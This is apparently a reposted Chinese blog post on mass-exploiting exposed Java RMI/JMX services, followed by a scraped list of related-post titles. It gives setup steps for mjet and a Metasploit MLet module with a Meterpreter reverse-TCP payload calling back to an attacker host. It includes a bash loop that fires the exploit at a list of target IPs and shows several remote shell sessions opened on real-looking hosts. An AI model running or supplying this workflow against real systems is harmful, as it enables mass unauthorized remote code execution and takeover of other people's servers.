声明:不会Java。

参考:https://www.secpulse.com/archives/6203.html

下载mjet,https://github.com/mogwaisec/mjet

按照说明中的步骤:

  • Copy the "MBean" folder to "data/java/metasploit"
  • Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

启动msf监听,选择刚才导入的那个模块

 1 msf > use exploit/multi/misc/java_mlet_server
 2 msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp
 3 payload => java/meterpreter/reverse_tcp
 4 msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1
 5 LHOST => 1.1.1.1
 6 msf exploit(multi/misc/java_mlet_server) > set LPORT 4444
 7 LPORT => 4444
 8 msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/
 9 URIPATH => /bobac/
10 msf exploit(multi/misc/java_mlet_server) > run
11 [*] Started reverse TCP handler on 1.1.1.1:4444
12 [*] Using URL: http://0.0.0.0:8080/bobac/
13 [*] Local IP: http://1.1.1.1:8080/bobac/
14 [*] Server started.

然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。

1 #!/bin/bash
2 function getip(){
3 while read i
4 do
5     timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'`
6 done < rmi-ip.txt
7 }
8 getip

rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。

 1 msf exploit(multi/misc/java_mlet_server) >
 2 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 3 [*] Sending stage (53859 bytes) to x.x.x.x
 4 [*] Meterpreter session 3 opened (x.x.x.x:4444 -> x.x.x.x:33477) at 2018-02-24 17:38:05 +0800
 5 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 6 [*] Sending stage (53859 bytes) to x.x.x.x
 7 [*] Meterpreter session 4 opened (x.x.x.x:4444 -> x.x.x.x:33486) at 2018-02-24 17:38:08 +0800
 8 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 9 [*] Sending stage (53859 bytes) to x.x.x.x
10 [*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:19321) at 2018-02-24 17:38:22 +0800
11 [*] x.x.x.x java_mlet_server - handling request for /bobac/
12 [*] x.x.x.x java_mlet_server - handling request for /bobac/
13 [*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar
14 [*] Sending stage (53859 bytes) to x.x.x.x
15 [*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:56411) at 2018-02-24 17:40:53 +0800

6个,sessions -i 找一个进去

--enjoy your shell :)

转载于:https://www.cnblogs.com/co10rway/p/8467312.html

利用MSF批量打RMI漏洞相关推荐

  1. kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

    kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...

  2. kail利用msf工具对MS12-020漏洞进行渗透测试

    kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...

  3. kail利用msf工具对ms11-003漏洞入侵渗透Win7

    前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...

  4. kail利用msf工具对ms10-087漏洞入侵渗透WinXP

    1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和M ...

  5. Kali利用msf对MS10_061漏洞进行渗透测试

    注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...

  6. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

  7. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  8. Kali利用MSF入侵安卓手机

    kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

  9. 利用wxid批量加好友

    在2023年2月12号微信更新后,许多做营销的都用相关导群软件都导不出微信号了,只能导出wxid,而wxid是搜索不到添加不了好友的,那么我们现在就可以利用wxid扫一扫协议利用wxid批量加好友, ...

最新文章

  1. 对当前JAVA流行框架的一些小感悟
  2. python编程语法-Python编程入门——基础语法详解
  3. 【C语言】13-指针和字符串
  4. GiliSoft Video Editor 13中文版
  5. wordpress插件制作
  6. 今天用Map集合写了一个字符串字符统计的程序,看集合看的头痛,就看了一下GUI,于是就随便记点。
  7. 怎么能把你的公司快速做大呢
  8. 扒一扒AI的那些事儿
  9. ubuntu 20.04gitlab-runner docker方式安装使用
  10. 浅析企业云服务之SaaS、PaaS、IaaS对比分析
  11. android百度地图路线查询,Android百度地图——路线规划搜索
  12. 诗词-已然绿盈盈蓝点缀
  13. web前端的css示例
  14. 关于列columns的一些配置
  15. Java-分布式锁的实现方式
  16. python出现invalid syntax什么意思_关于Python出现invalid syntax的几种原因
  17. 从零维到十维空间如何在纸上用手绘出来
  18. pip 安装 sklearn 教程 ----Win10 python3.5
  19. uboot-uboot升级调试uboot篇
  20. 把《算法的乐趣》随书源码放在GitHub上了

热门文章

  1. mysql启动提示 access denied for user root@localhost(using password:YES) 解决办法总结
  2. Android修图处理算法—— drawBitmapMesh算法实现瘦脸效果
  3. Android studio中提交svn一直卡在performing VCS commit
  4. 【clickhouse】clickhouse 表引擎 之 SummIngMergeTree
  5. 【java】ASM代理方式 Byte-Buddy代理方式 Javassist代理方式
  6. 【Elasticsearch】Elasticsearch 索引 模板 template
  7. 【Flink】Flink UI 查看 subtask在相应的机器上的调度时间
  8. Oracle match_recognize
  9. drools 7.x定时器
  10. gtp文件服务器,GTP中文网吉它谱吉他谱guitar网站